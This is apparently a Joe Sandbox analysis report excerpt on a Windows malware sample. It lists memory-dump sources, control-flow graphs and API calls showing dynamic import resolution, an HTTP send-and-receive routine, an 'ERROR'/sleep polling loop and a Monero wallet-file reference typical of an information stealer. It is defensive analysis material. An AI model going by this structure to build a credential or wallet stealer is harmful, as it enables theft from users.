                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 3f6a05f321f3310462770d2303652dfb6edcd565cf7c580fad7744e0b4b3e3bd
                                • Instruction ID: e505980b8ec39f50ef08a7fcbad4708dd093387b50770331282e4696844971cc
                                • Opcode Fuzzy Hash: 3f6a05f321f3310462770d2303652dfb6edcd565cf7c580fad7744e0b4b3e3bd
                                • Instruction Fuzzy Hash: ECD05E7490130C9BCB14DFE0A84D6DDBB79FB0C325F0005A4D91572380EA306481CB65
                                Function 00EB9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 eb9f20-eb9f2a 634 eb9f30-eba341 GetProcAddress * 43 633->634 635 eba346-eba3da LoadLibraryA * 8 633->635 634->635 636 eba3dc-eba451 GetProcAddress * 5 635->636 637 eba456-eba45d 635->637 636->637 638 eba463-eba521 GetProcAddress * 8 637->638 639 eba526-eba52d 637->639 638->639 640 eba5a8-eba5af 639->640 641 eba52f-eba5a3 GetProcAddress * 5 639->641 642 eba647-eba64e 640->642 643 eba5b5-eba642 GetProcAddress * 6 640->643 641->640 644 eba72f-eba736 642->644 645 eba654-eba72a GetProcAddress * 9 642->645 643->642 646 eba738-eba7ad GetProcAddress * 5 644->646 647 eba7b2-eba7b9 644->647 645->644 646->647 648 eba7bb-eba7e7 GetProcAddress * 2 647->648 649 eba7ec-eba7f3 647->649 648->649 650 eba825-eba82c 649->650 651 eba7f5-eba820 GetProcAddress * 2 649->651 652 eba922-eba929 650->652 653 eba832-eba91d GetProcAddress * 10 650->653 651->650 654 eba92b-eba988 GetProcAddress * 4 652->654 655 eba98d-eba994 652->655 653->652 654->655 656 eba9ae-eba9b5 655->656 657 eba996-eba9a9 GetProcAddress 655->657 658 ebaa18-ebaa19 656->658 659 eba9b7-ebaa13 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01BE5C90), ref: 00EB9F3D
                                • GetProcAddress.KERNEL32(74DD0000,01BE5D30), ref: 00EB9F55
                                • GetProcAddress.KERNEL32(74DD0000,01BFA810), ref: 00EB9F6E
                                • GetProcAddress.KERNEL32(74DD0000,01BFA870), ref: 00EB9F86
                                • GetProcAddress.KERNEL32(74DD0000,01BFA888), ref: 00EB9F9E
                                • GetProcAddress.KERNEL32(74DD0000,01BFA828), ref: 00EB9FB7
                                • GetProcAddress.KERNEL32(74DD0000,01BEC7C0), ref: 00EB9FCF
                                • GetProcAddress.KERNEL32(74DD0000,01BFE000), ref: 00EB9FE7
                                • GetProcAddress.KERNEL32(74DD0000,01BFDF88), ref: 00EBA000
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE38), ref: 00EBA018
                                • GetProcAddress.KERNEL32(74DD0000,01BFE048), ref: 00EBA030
                                • GetProcAddress.KERNEL32(74DD0000,01BE5DF0), ref: 00EBA049
                                • GetProcAddress.KERNEL32(74DD0000,01BE5DD0), ref: 00EBA061
                                • GetProcAddress.KERNEL32(74DD0000,01BE5CD0), ref: 00EBA079
                                • GetProcAddress.KERNEL32(74DD0000,01BE5CB0), ref: 00EBA092
                                • GetProcAddress.KERNEL32(74DD0000,01BFDD90), ref: 00EBA0AA
                                • GetProcAddress.KERNEL32(74DD0000,01BFDDA8), ref: 00EBA0C2
                                • GetProcAddress.KERNEL32(74DD0000,01BECAB8), ref: 00EBA0DB
                                • GetProcAddress.KERNEL32(74DD0000,01BE5AB0), ref: 00EBA0F3
                                • GetProcAddress.KERNEL32(74DD0000,01BFDF58), ref: 00EBA10B
                                • GetProcAddress.KERNEL32(74DD0000,01BFDDC0), ref: 00EBA124
                                • GetProcAddress.KERNEL32(74DD0000,01BFDFD0), ref: 00EBA13C
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE20), ref: 00EBA154
                                • GetProcAddress.KERNEL32(74DD0000,01BE5B90), ref: 00EBA16D
                                • GetProcAddress.KERNEL32(74DD0000,01BFE030), ref: 00EBA185
                                • GetProcAddress.KERNEL32(74DD0000,01BFE060), ref: 00EBA19D
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE68), ref: 00EBA1B6
                                • GetProcAddress.KERNEL32(74DD0000,01BFDFA0), ref: 00EBA1CE
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE80), ref: 00EBA1E6
                                • GetProcAddress.KERNEL32(74DD0000,01BFE018), ref: 00EBA1FF
                                • GetProcAddress.KERNEL32(74DD0000,01BFDEF8), ref: 00EBA217
                                • GetProcAddress.KERNEL32(74DD0000,01BFDD78), ref: 00EBA22F
                                • GetProcAddress.KERNEL32(74DD0000,01BFDDF0), ref: 00EBA248
                                • GetProcAddress.KERNEL32(74DD0000,01BFB700), ref: 00EBA260
                                • GetProcAddress.KERNEL32(74DD0000,01BFDDD8), ref: 00EBA278
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE50), ref: 00EBA291
                                • GetProcAddress.KERNEL32(74DD0000,01BE5CF0), ref: 00EBA2A9
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE08), ref: 00EBA2C1
                                • GetProcAddress.KERNEL32(74DD0000,01BE58F0), ref: 00EBA2DA
                                • GetProcAddress.KERNEL32(74DD0000,01BFDE98), ref: 00EBA2F2
                                • GetProcAddress.KERNEL32(74DD0000,01BFDEB0), ref: 00EBA30A
                                • GetProcAddress.KERNEL32(74DD0000,01BE5950), ref: 00EBA323
                                • GetProcAddress.KERNEL32(74DD0000,01BE5970), ref: 00EBA33B
                                • LoadLibraryA.KERNEL32(01BFDEC8,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA34D
                                • LoadLibraryA.KERNEL32(01BFDEE0,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA35E
                                • LoadLibraryA.KERNEL32(01BFDF70,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA370
                                • LoadLibraryA.KERNEL32(01BFDF10,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA382
                                • LoadLibraryA.KERNEL32(01BFDF28,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA393
                                • LoadLibraryA.KERNEL32(01BFDFB8,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA3A5
                                • LoadLibraryA.KERNEL32(01BFDF40,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA3B7
                                • LoadLibraryA.KERNEL32(01BFDFE8,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA3C8
                                • GetProcAddress.KERNEL32(75290000,01BE57D0), ref: 00EBA3EA
                                • GetProcAddress.KERNEL32(75290000,01BFE180), ref: 00EBA402
                                • GetProcAddress.KERNEL32(75290000,01BF9E08), ref: 00EBA41A
                                • GetProcAddress.KERNEL32(75290000,01BFE150), ref: 00EBA433
                                • GetProcAddress.KERNEL32(75290000,01BE57F0), ref: 00EBA44B
                                • GetProcAddress.KERNEL32(73B50000,01BECAE0), ref: 00EBA470
                                • GetProcAddress.KERNEL32(73B50000,01BE56F0), ref: 00EBA489
                                • GetProcAddress.KERNEL32(73B50000,01BEC9F0), ref: 00EBA4A1
                                • GetProcAddress.KERNEL32(73B50000,01BFE270), ref: 00EBA4B9
                                • GetProcAddress.KERNEL32(73B50000,01BFE1E0), ref: 00EBA4D2
                                • GetProcAddress.KERNEL32(73B50000,01BE56D0), ref: 00EBA4EA
                                • GetProcAddress.KERNEL32(73B50000,01BE59F0), ref: 00EBA502
                                • GetProcAddress.KERNEL32(73B50000,01BFE090), ref: 00EBA51B
                                • GetProcAddress.KERNEL32(752C0000,01BE5930), ref: 00EBA53C
                                • GetProcAddress.KERNEL32(752C0000,01BE5730), ref: 00EBA554
                                • GetProcAddress.KERNEL32(752C0000,01BFE2B8), ref: 00EBA56D
                                • GetProcAddress.KERNEL32(752C0000,01BFE2A0), ref: 00EBA585
                                • GetProcAddress.KERNEL32(752C0000,01BE5910), ref: 00EBA59D
                                • GetProcAddress.KERNEL32(74EC0000,01BEC770), ref: 00EBA5C3
                                • GetProcAddress.KERNEL32(74EC0000,01BEC608), ref: 00EBA5DB
                                • GetProcAddress.KERNEL32(74EC0000,01BFE240), ref: 00EBA5F3
                                • GetProcAddress.KERNEL32(74EC0000,01BE59D0), ref: 00EBA60C
                                • GetProcAddress.KERNEL32(74EC0000,01BE5850), ref: 00EBA624
                                • GetProcAddress.KERNEL32(74EC0000,01BEC838), ref: 00EBA63C
                                • GetProcAddress.KERNEL32(75BD0000,01BFE258), ref: 00EBA662
                                • GetProcAddress.KERNEL32(75BD0000,01BE5A10), ref: 00EBA67A
                                • GetProcAddress.KERNEL32(75BD0000,01BF9E38), ref: 00EBA692
                                • GetProcAddress.KERNEL32(75BD0000,01BFE138), ref: 00EBA6AB
                                • GetProcAddress.KERNEL32(75BD0000,01BFE108), ref: 00EBA6C3
                                • GetProcAddress.KERNEL32(75BD0000,01BE5990), ref: 00EBA6DB
                                • GetProcAddress.KERNEL32(75BD0000,01BE5A30), ref: 00EBA6F4
                                • GetProcAddress.KERNEL32(75BD0000,01BFE168), ref: 00EBA70C
                                • GetProcAddress.KERNEL32(75BD0000,01BFE288), ref: 00EBA724
                                • GetProcAddress.KERNEL32(75A70000,01BE5890), ref: 00EBA746
                                • GetProcAddress.KERNEL32(75A70000,01BFE318), ref: 00EBA75E
                                • GetProcAddress.KERNEL32(75A70000,01BFE2E8), ref: 00EBA776
                                • GetProcAddress.KERNEL32(75A70000,01BFE198), ref: 00EBA78F
                                • GetProcAddress.KERNEL32(75A70000,01BFE120), ref: 00EBA7A7
                                • GetProcAddress.KERNEL32(75450000,01BE5710), ref: 00EBA7C8
                                • GetProcAddress.KERNEL32(75450000,01BE5770), ref: 00EBA7E1
                                • GetProcAddress.KERNEL32(75DA0000,01BE5750), ref: 00EBA802
                                • GetProcAddress.KERNEL32(75DA0000,01BFE360), ref: 00EBA81A
                                • GetProcAddress.KERNEL32(6F070000,01BE57B0), ref: 00EBA840
                                • GetProcAddress.KERNEL32(6F070000,01BE5870), ref: 00EBA858
                                • GetProcAddress.KERNEL32(6F070000,01BE5A50), ref: 00EBA870
                                • GetProcAddress.KERNEL32(6F070000,01BFE2D0), ref: 00EBA889
                                • GetProcAddress.KERNEL32(6F070000,01BE5810), ref: 00EBA8A1
                                • GetProcAddress.KERNEL32(6F070000,01BE58B0), ref: 00EBA8B9
                                • GetProcAddress.KERNEL32(6F070000,01BE59B0), ref: 00EBA8D2
                                • GetProcAddress.KERNEL32(6F070000,01BE5A70), ref: 00EBA8EA
                                • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00EBA901
                                • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00EBA917
                                • GetProcAddress.KERNEL32(75AF0000,01BFE0A8), ref: 00EBA939
                                • GetProcAddress.KERNEL32(75AF0000,01BF9E18), ref: 00EBA951
                                • GetProcAddress.KERNEL32(75AF0000,01BFE300), ref: 00EBA969
                                • GetProcAddress.KERNEL32(75AF0000,01BFE330), ref: 00EBA982
                                • GetProcAddress.KERNEL32(75D90000,01BE5790), ref: 00EBA9A3
                                • GetProcAddress.KERNEL32(6E360000,01BFE348), ref: 00EBA9C4
                                • GetProcAddress.KERNEL32(6E360000,01BE5690), ref: 00EBA9DD
                                • GetProcAddress.KERNEL32(6E360000,01BFE1B0), ref: 00EBA9F5
                                • GetProcAddress.KERNEL32(6E360000,01BFE1C8), ref: 00EBAA0D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: c8259cbf2507db9264ffa103abfefabc32109d76d99a4cff504325d03e9ca6e4
                                • Instruction ID: 503ff1e3970c5ee650272bb2e15ba1dd664f8ce6113b461f6f9eb196c656a95b
                                • Opcode Fuzzy Hash: c8259cbf2507db9264ffa103abfefabc32109d76d99a4cff504325d03e9ca6e4
                                • Instruction Fuzzy Hash: 5C621CB56106009FD36CDFA8F98C9567BBAA74D701B10893AF939C3398DA7599C0CF60
                                Function 00EA48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 ea48d0-ea4992 call ebaab0 call ea4800 call ebaa50 * 5 InternetOpenA StrCmpCA 816 ea499b-ea499f 801->816 817 ea4994 801->817 818 ea4f1b-ea4f43 InternetCloseHandle call ebade0 call eaa210 816->818 819 ea49a5-ea4b1d call eb8cf0 call ebac30 call ebabb0 call ebab10 * 2 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebac30 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebac30 call ebabb0 call ebab10 * 2 InternetConnectA 816->819 817->816 829 ea4f82-ea4ff2 call eb8b20 * 2 call ebaab0 call ebab10 * 8 818->829 830 ea4f45-ea4f7d call ebab30 call ebacc0 call ebabb0 call ebab10 818->830 819->818 905 ea4b23-ea4b27 819->905 830->829 906 ea4b29-ea4b33 905->906 907 ea4b35 905->907 908 ea4b3f-ea4b72 HttpOpenRequestA 906->908 907->908 909 ea4b78-ea4e78 call ebacc0 call ebabb0 call ebab10 call ebac30 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebac30 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebac30 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebac30 call ebabb0 call ebab10 call ebaa50 call ebac30 * 2 call ebabb0 call ebab10 * 2 call ebade0 lstrlen call ebade0 * 2 lstrlen call ebade0 HttpSendRequestA 908->909 910 ea4f0e-ea4f15 InternetCloseHandle 908->910 1021 ea4e82-ea4eac InternetReadFile 909->1021 910->818 1022 ea4eae-ea4eb5 1021->1022 1023 ea4eb7-ea4f09 InternetCloseHandle call ebab10 1021->1023 1022->1023 1024 ea4eb9-ea4ef7 call ebacc0 call ebabb0 call ebab10 1022->1024 1023->910 1024->1021
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EA4889
                                  • Part of subcall function 00EA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EA4899
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EA4965
                                • StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA498A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EA4B0A
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00EC0DDE,00000000,?,?,00000000,?,",00000000,?,01BFF820), ref: 00EA4E38
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EA4E54
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EA4E68
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EA4E99
                                • InternetCloseHandle.WININET(00000000), ref: 00EA4EFD
                                • InternetCloseHandle.WININET(00000000), ref: 00EA4F15
                                • HttpOpenRequestA.WININET(00000000,01BFF830,?,01BFF220,00000000,00000000,00400100,00000000), ref: 00EA4B65
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • InternetCloseHandle.WININET(00000000), ref: 00EA4F1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: 230775f955b93faf048fb851b44ea4e3215a783552858ed05a60c7de890d3135
                                • Instruction ID: 486a9d290572015088fe8fda3052e1b095af7bb7e8268d38411e4274402d7087
                                • Opcode Fuzzy Hash: 230775f955b93faf048fb851b44ea4e3215a783552858ed05a60c7de890d3135
                                • Instruction Fuzzy Hash: 3412E972910218AACF14EB90DDA2FEEB7B9AF14300F5455B9F11672191EF702B48CF61
                                Function 00EB5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 eb5760-eb57c7 call eb5d20 call ebab30 * 3 call ebaa50 * 4 1106 eb57cc-eb57d3 1090->1106 1107 eb5827-eb589c call ebaa50 * 2 call ea1590 call eb5510 call ebabb0 call ebab10 call ebade0 StrCmpCA 1106->1107 1108 eb57d5-eb5806 call ebab30 call ebaab0 call ea1590 call eb5440 1106->1108 1133 eb58e3-eb58f9 call ebade0 StrCmpCA 1107->1133 1138 eb589e-eb58de call ebaab0 call ea1590 call eb5440 call ebabb0 call ebab10 1107->1138 1124 eb580b-eb5822 call ebabb0 call ebab10 1108->1124 1124->1133 1140 eb58ff-eb5906 1133->1140 1141 eb5a2c-eb5a94 call ebabb0 call ebab30 * 2 call ea16b0 call ebab10 * 4 call ea1670 call ea1550 1133->1141 1138->1133 1144 eb5a2a-eb5aaf call ebade0 StrCmpCA 1140->1144 1145 eb590c-eb5913 1140->1145 1270 eb5d13-eb5d16 1141->1270 1164 eb5be1-eb5c49 call ebabb0 call ebab30 * 2 call ea16b0 call ebab10 * 4 call ea1670 call ea1550 1144->1164 1165 eb5ab5-eb5abc 1144->1165 1149 eb596e-eb59e3 call ebaa50 * 2 call ea1590 call eb5510 call ebabb0 call ebab10 call ebade0 StrCmpCA 1145->1149 1150 eb5915-eb5969 call ebab30 call ebaab0 call ea1590 call eb5440 call ebabb0 call ebab10 1145->1150 1149->1144 1250 eb59e5-eb5a25 call ebaab0 call ea1590 call eb5440 call ebabb0 call ebab10 1149->1250 1150->1144 1164->1270 1171 eb5bdf-eb5c64 call ebade0 StrCmpCA 1165->1171 1172 eb5ac2-eb5ac9 1165->1172 1201 eb5c78-eb5ce1 call ebabb0 call ebab30 * 2 call ea16b0 call ebab10 * 4 call ea1670 call ea1550 1171->1201 1202 eb5c66-eb5c71 Sleep 1171->1202 1180 eb5acb-eb5b1e call ebab30 call ebaab0 call ea1590 call eb5440 call ebabb0 call ebab10 1172->1180 1181 eb5b23-eb5b98 call ebaa50 * 2 call ea1590 call eb5510 call ebabb0 call ebab10 call ebade0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 eb5b9a-eb5bda call ebaab0 call ea1590 call eb5440 call ebabb0 call ebab10 1181->1275 1201->1270 1202->1106 1250->1144 1275->1171
                                APIs
                                  • Part of subcall function 00EBAB30: lstrlen.KERNEL32(UO,?,?,00EA4F55,00EC0DDF), ref: 00EBAB3B
                                  • Part of subcall function 00EBAB30: lstrcpy.KERNEL32(00EC0DDF,00000000), ref: 00EBAB95
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EB5894
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EB58F1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EB5AA7
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EB5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EB5478
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EB5568
                                  • Part of subcall function 00EB5510: lstrlen.KERNEL32(00000000), ref: 00EB557F
                                  • Part of subcall function 00EB5510: StrStrA.SHLWAPI(00000000,00000000), ref: 00EB55B4
                                  • Part of subcall function 00EB5510: lstrlen.KERNEL32(00000000), ref: 00EB55D3
                                  • Part of subcall function 00EB5510: lstrlen.KERNEL32(00000000), ref: 00EB55FE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EB59DB
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EB5B90
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EB5C5C
                                • Sleep.KERNEL32(0000EA60), ref: 00EB5C6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 8599ea7f0d2c642b5800536f6b4adb774e3e36a82f3d4d471885a44fd19c5452
                                • Instruction ID: 0317a53deb376d45f72524f163fd022433198ed00318d50f4eb39e233cc66911
